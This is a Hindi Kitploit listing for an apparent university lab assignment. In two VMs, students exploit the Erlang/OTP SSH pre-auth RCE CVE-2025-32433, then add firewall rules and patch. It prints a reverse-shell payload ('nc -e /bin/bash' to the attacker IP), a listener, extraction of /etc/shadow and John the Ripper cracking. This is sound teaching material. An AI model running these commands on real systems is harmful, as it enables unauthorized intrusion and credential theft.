Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Exploiting-a-vulnerability-using-reverse-shell — यह प्रोजेक्ट दो वर्चुअल मशीनों में एक वास्तविक दुनिया के आक्रमण-और-रक्षा परिदृश्य का अनुकरण करता है। आप एक Erlang/OTP SSH सर्वर में एक महत्वपूर्ण प्री-ऑथेंटिकेशन RCE भेद्यता (CVE-2025-32433) का शोषण करेंगे, निकाले गए पासवर्ड हैश को क्रैक करेंगे, और फिर फायरवॉल नियमों और पैचिंग के साथ पीड़ित मशीन को सख्त करेंगे। | Kitploit
उपकरण/GitHubGitHub/dampedcoast/exploiting-a-vulnerability-using-reverse-shell
पासवर्ड क्रैकिंगभेद्यता विश्लेषणशोषणनेटवर्क सुरक्षाCTFपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षालैब और अभ्यास

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →

विवरण

यह प्रोजेक्ट दो वर्चुअल मशीनों में एक वास्तविक दुनिया के आक्रमण-और-रक्षा परिदृश्य का अनुकरण करता है। आप एक Erlang/OTP SSH सर्वर में एक महत्वपूर्ण प्री-ऑथेंटिकेशन RCE भेद्यता (CVE-2025-32433) का शोषण करेंगे, निकाले गए पासवर्ड हैश को क्रैक करेंगे, और फिर फायरवॉल नियमों और पैचिंग के साथ पीड़ित मशीन को सख्त करेंगे।

GitHub
dampedcoast/exploiting-a-vulnerability-using-reverse-shell

Exploiting-a-vulnerability-using-reverse-shell

रिपॉजिटरी देखें
52 महीने पहलेअभी तक समीक्षित नहीं
साझा करें

सूचना सुरक्षा मूलभूत — स्प्रिंग 2026 परियोजना

कुल अंक: 20 | समय सीमा: कोई देर से प्रस्तुतिकरण स्वीकार नहीं किया जाएगा

अवलोकन

यह परियोजना दो वर्चुअल मशीनों पर एक वास्तविक-विश्व हमला-और-बचाव परिदृश्य का अनुकरण करती है। आप Erlang/OTP SSH सर्वर में एक महत्वपूर्ण प्री-ऑथेंटिकेशन RCE भेद्यता (CVE-2025-32433) का शोषण करेंगे, निकाले गए पासवर्ड हैश को क्रैक करेंगे, और फिर फायरवॉल नियमों और पैचिंग के साथ पीड़ित मशीन को सुरक्षित करेंगे।

भूमिकाOS
हमलावरKali Linux
पीड़ितUbuntu/Debian (Erlang/OTP SSH v27.3.2)

फ़ाइलें

फ़ाइलविवरण
Debian-1.ovaपूर्व-निर्मित पीड़ित VM इमेज — अलग से डाउनलोड करें, देखें (GitHub के लिए बहुत बड़ी)

संसाधन

  • पीड़ित VM (Debian-1.ova): डाउनलोड लिंक — GitHub पर होस्ट करने के लिए बहुत बड़ा (~3GB)। अलग से डाउनलोड करें और नीचे वर्णित अनुसार VirtualBox/VMware में आयात करें।
  • वर्डलिस्ट (rockyou_txt.txt): इस रिपॉजिटरी में शामिल है, भाग 2 में पासवर्ड क्रैकिंग चरण के लिए उपयोग किया जाता है।

सेटअप

  1. VMs आयात करें — Debian-1.ova और अपने Kali Linux VM को VirtualBox/VMware में लोड करें।
  2. नेटवर्क — दोनों VMs को होस्ट-ओनली एडेप्टर पर सेट करें ताकि वे निजी रूप से संचार कर सकें।
  3. पीड़ित IP — पीड़ित को बूट करें और उसका IP जानने के लिए ifconfig चलाएं (आमतौर पर 192.168.56.0/24 में)।

भाग 1 — संवेदनशील SSH सर्वर तैनाती और शोषण (10 अंक)

जासूसी

root@kitploit:~
nmap -p 2222 -sV -A <victim-IP>

खुले पोर्ट, सेवा संस्करण और Erlang हस्ताक्षर दस्तावेज़ित करें।

CVE-2025-32433 का शोषण (प्री-ऑथ RCE)

Kali को अस्थायी रूप से NAT पर स्विच करें रिपॉजिटरी को क्लोन करने के लिए, फिर वापस होस्ट-ओनली पर स्विच करें।

root@kitploit:~
git clone https://github.com/ProDefense/CVE-2025-32433.git
cd CVE-2025-32433
sudo nano CVE-2025-32433.py

स्क्रिप्ट संपादित करें — HOST = "<victim-IP>" सेट करें और पेलोड अपडेट करें:

root@kitploit:~
command='os:cmd("nc -e /bin/bash <Kali-IP> 4444").'

टर्मिनल 1 (Kali) — लिस्नर शुरू करें:

root@kitploit:~
nc -lvnp 4444

टर्मिनल 2 (Kali) — शोषण लॉन्च करें:

root@kitploit:~
python3 CVE-2025-32433.py

रिवर्स शेल में, पहुंच की पुष्टि करने के लिए whoami और hostname चलाएं।


भाग 2 — पोस्ट-एक्सप्लॉइटेशन और पासवर्ड क्रैकिंग (5 अंक)

हैश निकालें और क्रैक करें

root@kitploit:~
# On victim (via reverse shell)
cat /etc/shadow | grep testuser > hash.txt

# On Kali
john --wordlist=rockyou_txt.txt hash.txt

हैश प्रारूप (जैसे, $6$ = SHA-512), लिया गया समय, और प्राप्त सादा पाठ पासवर्ड दस्तावेज़ित करें।

फ़्लैग ढूँढें

root@kitploit:~
find / -iname "flag.txt" 2>/dev/null
cat /path/to/flag.txt

भाग 3 — नियंत्रण और उपाय (5 अंक)

हमला वेक्टर को ब्लॉक करें (iptables)

root@kitploit:~
sudo iptables -A INPUT -p tcp --dport 2222 -j DROP

Kali से Nmap स्कैन और शोषण फिर से चलाएं — दस्तावेज़ित करें कि पोर्ट 2222 अब "Filtered" है और शोषण विफल हो जाता है।

भेद्यता को पैच करें

Erlang/OTP को v27.3.3 या बाद के संस्करण में अपग्रेड करने के चरणों का दस्तावेज़ीकरण करें, जिसमें CVE-2025-32433 के लिए फिक्स शामिल है।


डिलिवरेबल्स

  • स्कैन, शोषण निष्पादन, रिवर्स शेल (whoami/hostname), फ़्लैग कैप्चर के स्क्रीनशॉट के साथ पूर्ण रिपोर्ट
  • फायरवॉल पहले/बाद दस्तावेज़ीकरण (पोर्ट स्थिति परिवर्तन दिखाने वाले Nmap परिणाम)
  • लिखित प्रतिबिंब यह समझाते हुए कि प्री-ऑथेंटिकेशन RCE पोस्ट-ऑथ शोषण की तुलना में काफी अधिक खतरनाक क्यों हैं

CVE संदर्भ

CVE-2025-32433 — Erlang/OTP SSH सर्वर में महत्वपूर्ण प्री-ऑथेंटिकेशन रिमोट कोड निष्पादन। किसी भी क्रेडेंशियल एक्सचेंज से पहले दूषित SSH पैकेट भेजकर शोषणीय, एक अप्रमाणित हमलावर को पूर्ण शेल पहुंच प्रदान करता है।

टूल डाउनलोड करें
Resources
Project Spring 2026 - Google Docs.pdfडिलिवरेबल्स के साथ पूर्ण परियोजना निर्देश
rockyou_txt.txtJohn the Ripper के साथ निकाले गए पासवर्ड हैश को क्रैक करने के लिए उपयोग की जाने वाली वर्डलिस्ट